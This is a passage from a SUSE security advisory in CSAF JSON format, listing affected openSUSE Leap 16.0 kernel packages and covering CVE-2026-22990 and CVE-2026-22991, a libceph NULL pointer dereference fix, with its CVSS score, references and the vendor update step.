"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2026-22990"
},
{
"cve": "CVE-2026-22991",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22991"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make free_choose_arg_map() resilient to partial allocation\n\nfree_choose_arg_map() may dereference a NULL pointer if its caller fails\nafter a partial allocation.\n\nFor example, in decode_choose_args(), if allocation of arg_map-\u003eargs\nfails, execution jumps to the fail label and free_choose_arg_map() is\ncalled. Since arg_map-\u003esize is updated to a non-zero value before memory\nallocation, free_choose_arg_map() will iterate over arg_map-\u003eargs and\ndereference a NULL pointer.\n\nTo prevent this potential NULL pointer dereference and make\nfree_choose_arg_map() more resilient, add checks for pointers before\niterating.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22991",
"url": "https://www.suse.com/security/cve/CVE-2026-22991"
},
{
"category": "external",
"summary": "SUSE Bug 1257220 for CVE-2026-22991",
"url": "https://bugzilla.suse.com/1257220"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
